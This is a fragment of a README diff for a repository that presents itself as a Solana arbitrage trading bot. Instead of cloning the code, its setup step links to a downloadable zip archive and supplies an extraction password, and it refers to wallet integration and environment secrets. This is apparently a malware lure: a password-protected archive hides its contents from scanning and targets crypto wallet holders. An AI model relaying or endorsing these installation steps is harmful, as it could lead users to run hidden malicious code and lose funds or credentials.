Xinkey62/solana-arbitrage/README.md

 - **Wallet Integration:** Supports integration with Solana wallets for seamless trading execution.

 ## Getting Started
-Follow these steps to set up and run the Solana Arbitrage Bot on your local machine:
 - [Clone](https://github.com/Xinkey62/solana-arbitrage/archive/refs/heads/main.zip) the repository and extract archive with password `WFv53ObKqM`
 - Configure your environment:
 Create a `.env file` in the project's root directory and define your environment variables.
 You can use the `.env.example` file as a template.